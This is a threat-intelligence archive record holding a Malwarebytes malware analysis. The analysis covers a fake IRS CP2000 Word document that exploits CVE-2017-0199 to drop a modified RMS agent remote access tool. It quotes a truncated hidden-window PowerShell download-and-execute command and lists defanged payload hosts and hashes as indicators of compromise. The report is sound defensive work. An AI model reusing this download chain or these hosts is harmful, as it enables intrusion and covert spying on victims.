{
	"id": "7e772dda-e85a-402e-bcbd-9206cf23cf82",
	"created_at": "2026-04-06T00:08:00.236309Z",
	"updated_at": "2026-04-10T03:21:18.363697Z",
	"deleted_at": null,
	"sha1_hash": "e30dcdd5d84456b4d00a76fdcbbbe1855042b027",
	"title": "Fake IRS notice delivers customized spying tool | Malwarebytes Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 364980,
	"plain_text": "Fake IRS notice delivers customized spying tool | Malwarebytes Labs\r\nBy Jérôme Segura\r\nPublished: 2017-09-20 · Archived: 2026-04-05 13:04:52 UTC\r\nWhile macro-based documents and scripts make up the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.\r\nVictims that fall for the scam will infect themselves with a custom Remote Administration Tool (RAT). A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files, or deploy a keylogger to silently capture keystrokes.\r\nIn this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.\r\nDistribution\r\nThe malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, the HTA script downloads the final payload, all with very little user interaction required, since it uses CVE-2017-0199, first uncovered in April 2017 as a zero-day.\r\n82.211.30[.]108/css/CP2000IRS.doc\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/\r\nPage 1 of 6\r\nThe embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.\r\nftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden (New-Object System.Net\r\nPayload\r\nThe downloaded payload (intelgfx.exe) extracts several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.\r\nRMS agent stands for Remote Manipulator System and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.\r\nIts source code shows the debugging path information and the name that they gave to the module.\r\nOffice exploits and RATs\r\nThis is not the first time that CVE-2017-0199 has been used to distribute a RAT. Last August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.\r\nWe reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload, which is detected as Backdoor.Bot.\r\nThanks to @hasherezade for help with payload analysis.\r\nIndicators of compromise\r\nWord doc CVE-2017-0199\r\n82.211.30[.]108/css/CP2000IRS.doc 47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1\r\nHTA script\r\nftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta d01b6d9507429df065b9b823e763a043aa38b722419\r\nMain package (intelgfx.exe)\r\n82.211.30[.]108/css/intelgfx.exe 924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8\r\nRAT module\r\n4d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186\r\nOther IOCs from same distribution server\r\n82.211.30[.]108/estate.xml\r\n82.211.30[.]108/css/qbks.exe\r\nSource: https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/"
	],
	"report_names": [
		"cve-2017-0199-used-to-deliver-modified-rms-agent-rat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434080,
	"ts_updated_at": 1775791278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e30dcdd5d84456b4d00a76fdcbbbe1855042b027.pdf",
		"text": "https://archive.orkl.eu/e30dcdd5d84456b4d00a76fdcbbbe1855042b027.txt",
		"img": "https://archive.orkl.eu/e30dcdd5d84456b4d00a76fdcbbbe1855042b027.jpg"
	}
}